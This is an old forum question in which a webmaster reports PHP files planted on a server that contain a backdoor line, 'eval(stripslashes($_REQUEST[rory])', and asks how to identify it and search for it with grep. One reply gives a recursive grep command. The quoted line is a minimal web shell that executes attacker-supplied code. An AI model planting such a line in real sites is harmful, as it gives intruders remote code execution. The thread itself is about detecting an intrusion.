Web site hack?
February 28, 2006 10:06 AM
Subscribe
Web site hacking attempts courtesy of "rory".
So I've seen several unknown files littered on the server side web site directories, usually a php file with code that includes:
eval(stripslashes($_REQUEST[rory])
or some variation of "rory was here". I assume these are hacking/backdoor attempts on the server, but I can't find specific information or links about that specific type of code.
Does anyone have any information about this "hack"?
I've tried using grep to check other files on the server, but it doesn't seem to be returning any results for "rory" (which isn't correct). What would be the proper grep command to search all the files for this code? What unix command would I use to check the server to see any changed files or owned by www, etc.?
posted by jca to computers & internet (32 comments total)
grep -r rory *
posted by IshmaelGraves at 10:16 AM on February 28, 2006